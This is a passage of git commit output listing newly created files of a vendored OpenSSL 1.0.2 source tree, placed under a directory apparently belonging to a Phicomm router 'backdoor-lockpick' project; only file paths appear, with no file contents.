 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa-pca.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa1024.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsa512.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsap.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsaparam.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/dsaparam.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ec.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ec.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ecparam.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ecparam.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/enc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/enc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/engine.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/engine.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/errstr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/errstr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendh.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendh.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendsa.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendsa.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genpkey.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genpkey.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genrsa.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genrsa.o
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/install-apps.com
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/makeapps.com
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/md4.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/nseq.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/nseq.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ocsp.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ocsp.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/oid.cnf
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl-vms.cnf
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.cnf
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/passwd.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/passwd.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-cert.srl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-key.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pca-req.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs12.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs12.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs7.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs7.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs8.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkcs8.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkey.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkey.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyparam.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyparam.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyutl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/pkeyutl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/prime.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/prime.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/privkey.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/progs.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/progs.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rand.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rand.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsa8192.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsautl.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsautl.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s1024key.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s1024req.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s512-key.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s512-req.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_apps.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_cb.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_cb.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_client.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_client.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_server.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_server.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_socket.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_socket.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_time.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_time.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server.srl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server2.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/sess_id.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/sess_id.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set-g-ca.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set-m-ca.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_b_ca.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_c_ca.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_d_ct.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/set/set_root.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/smime.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/smime.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/speed.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/speed.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/spkac.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/spkac.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/srp.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/srp.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testCA.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testdsa.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testrsa.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/timeouts.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ts.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ts.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/tsget
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/verify.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/verify.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/version.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/version.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/vms_decc_init.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/winrand.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/x509.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/x509.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/MS
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/SSLv3
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/alpha.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/dggccbug.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/sgiccbug.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/sslref.dif
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/stream.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/ultrixcc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/README.RootCerts
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/3f77a2b5.0
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/ca-cert.pem
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/cbdbd8bc.0
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/de4fa23b.0
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/dsa-ca.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/dsa-pca.pem
 create mode 120000 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/e83ef475.0
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/pca-cert.pem
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/expired/ICE.crl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/config
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_nyi.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_unix.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_vms.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_win.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_win32.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/LPdir_wince.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/README
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cbc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cbc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cfb.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cfb.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_core.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_core.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ctr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ctr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ecb.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ecb.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ige.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ige.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_misc.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_misc.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ofb.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ofb.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_wrap.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_wrap.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_x86core.c
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-586.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-armv4.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-ia64.S
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-mips.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-parisc.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-ppc.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-s390x.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-sparcv9.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-x86_64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-mb-x86_64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-sha1-x86_64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-sha256-x86_64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-x86.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesni-x86_64.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesp8-ppc.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aest4-sparcv9.pl
 create mode 100755 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aesv8-armx.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/bsaes-armv7.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/bsaes-x86_64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-ppc.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-x86.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/vpaes-x86_64.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/lib
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/alphacpuid.pl
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/arm64cpuid.S
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/arm_arch.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/armcap.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/armv4cpuid.S
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile.bak
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile.save
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bitstr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bitstr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bool.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bool.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bytes.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_bytes.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_d2i_fp.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_d2i_fp.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_digest.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_digest.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_dup.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_dup.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_enum.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_enum.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_gentm.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_gentm.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_i2d_fp.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_i2d_fp.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_int.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_int.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_mbstr.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_mbstr.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_object.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_object.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_octet.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_octet.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_print.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_print.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_set.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_set.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_sign.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_sign.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strex.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strex.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strnid.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strnid.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_time.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_time.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_type.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_type.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utctm.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utctm.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utf8.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utf8.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_verify.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_verify.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/ameth_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/ameth_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_err.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_err.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_gen.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_gen.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_lib.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_lib.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_locl.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_mac.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_par.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_par.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1t.h
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_mime.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_mime.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_moid.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_moid.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_pack.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_pack.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_asn1.c
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_asn1.o
 create mode 100644 Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/bio_ndef.c
